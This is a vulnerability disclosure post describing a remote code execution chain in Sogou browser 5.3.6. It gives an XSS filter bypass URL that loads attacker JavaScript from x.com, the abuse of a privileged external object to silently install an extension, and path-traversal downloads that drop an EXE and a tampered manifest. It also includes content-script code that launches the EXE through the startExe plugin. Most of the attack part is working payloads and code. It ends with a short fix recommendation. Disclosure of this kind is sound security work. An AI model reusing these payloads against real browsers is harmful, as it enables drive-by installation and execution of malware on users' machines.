Sogou browser vulnerabilities: the backdoor that remains after the fixes
I heard that Sogou's input method is quite good.
1. The latest version is 5.3.6.16631 (the version affected by the previously reported vulnerabilities was 5.2.5.15987), but the earlier issues were not fixed thoroughly.
2. The XSS has been patched, but the patch can still be bypassed. For example, to load an external JS file (http://x.com/poc/sogou5.2.js):
http://v.sogou.com/vc/play/redirect.jsp?url=http://live.wasu.cn/show/id/480').close();function open(){};if(!window._x){window._x=1;var s=document.createElement('script');s.src='//x.com/poc/sogou5.2.js?'%2bMath.random();document.body.appendChild(s);};a=open('A','&type=zhibo_vr&tvstation=%C7%E0%BA%A3%CE%C0%CA%D3
3. The problem that window.open("se://...").external exposes the high-privilege external object is still unresolved, so the technique from the earlier report remains valid (WooYun: Sogou Browser Remote Command Execution 5).
This means the com.sogou.cxj009.PicViewer extension can still be installed silently, and the XSS in that extension has not been fixed either. The previously reported defect that lets it download arbitrary files into a specified local directory is likewise unfixed (WooYun: Sogou Browser Remote Command Execution 4).
4. com.sogou.feichuan is installed by default at version 1.0.0.23, which does not contain the command-execution API described in the earlier report. If it is upgraded to 1.0.0.26, however, the earlier exploit still works.
5. So assume the user has com.sogou.feichuan 1.0.0.23 installed. We do not use this extension at all; instead we take a different route.
6. The method is as follows:
A. Use the defect in com.sogou.cxj009.PicViewer that allows downloading a file to an arbitrary directory (WooYun: Sogou Browser Remote Command Execution 4).
B. Download three files to the following locations (source URL --> destination path; the ../.. prefix climbs out of the directory the downloader writes to):
http://x.com/poc/sogou.xml --> ../..\Roaming\SogouExplorer\Extension\com.sogou.gamecenter\1.1.0\manifest.xml
http://x.com/poc/hehe.js --> ../..\Roaming\SogouExplorer\Extension\com.sogou.gamecenter\1.1.0\hehe.js
http://x.com/poc/calcx.exe --> ../..\Roaming\SogouExplorer\Extension\com.sogou.gamecenter\1.1.0\sogouminigamepacker.exe
The first file replaces manifest.xml of the com.sogou.gamecenter extension. It makes two changes:
1. Adds public="true" to the plugin entry with MIME type application/sogou-start-gamecenter-lite-plugin, so the plugin is exposed to any page.
2. Adds a content script entry for hehe.js with the match pattern *://*/*, so every web page loads the code in hehe.js.
The second file is hehe.js, the content script that gets loaded. Its code is as follows:

// Embed an application/sogou-start-gamecenter-lite-plugin object in the page
// (the embed markup is reconstructed: its id and type follow from the startExe call below)
var a = document.createElement("div");
a.innerHTML = '<embed id="embed1" type="application/sogou-start-gamecenter-lite-plugin">';
document.body.appendChild(a);
// Call startExe on the now-public plugin to run the EXE at the given path.
// The call is injected as a <script> element so it executes as page script.
// The path argument is taken verbatim from the original payload, including the embedded NUL.
var b = document.createElement("script");
b.innerHTML = 'document.getElementById("embed1").startExe("../../Roaming/SogouExplorer/Extension/com.sogou.gamecenter/1.1.0/\u0000", "/popgame", function(){})';
document.body.appendChild(b);
The third file is sogouminigamepacker.exe, the executable that the code in hehe.js launches.
C. When the user visits the attack page, the attacker drops the three files above.
The next time the browser is opened, any page the user visits loads the content script hehe.js, which calls startExe on the now-public application/sogou-start-gamecenter-lite-plugin to run the downloaded sogouminigamepacker.exe.
The process is shown in the figure below.
7. The full exploitation chain:
http://x.com/poc/sogou_combine2.htm
|
http://v.sogou.com/vc/play/redirect.jsp (XSS vulnerability)
|
http://x.com/poc/sogou5.2.js (loaded)
|
window.open("se://sidebarextmanager/index.html").external.extension("installExtFromSidebarBox", "com.sogou.cxj009.PicViewer", ...) (calls the high-privilege external object to install com.sogou.cxj009.PicViewer)
|
http://v.sogou.com/vc/play/redirect.jsp (the same XSS, exploited again)
|
http://x.com/poc/sogou5.3.js (loaded)
|
se-extension://ext-1588466412/v.html (uses the XSS in com.sogou.cxj009.PicViewer and its download API)
|
document.getElementById("picdownloader").download(...) (performs the three downloads from step 6)
|
The next time Sogou browser is used, the dropped EXE is executed.
8. The final effect is shown in the figure below.
Note: the test code targets com.sogou.gamecenter 1.1.0. A newer version 1.2.0 exists, but it does not affect the technique described here; just change the version in sogou.xml and the 1.1.0 in the code paths to 1.2.0.
Solution:
Fix the window.open("se://...").external issue first, and prevent this kind of malicious modification of manifest.xml: the browser should check manifest.xml for tampering before loading an extension.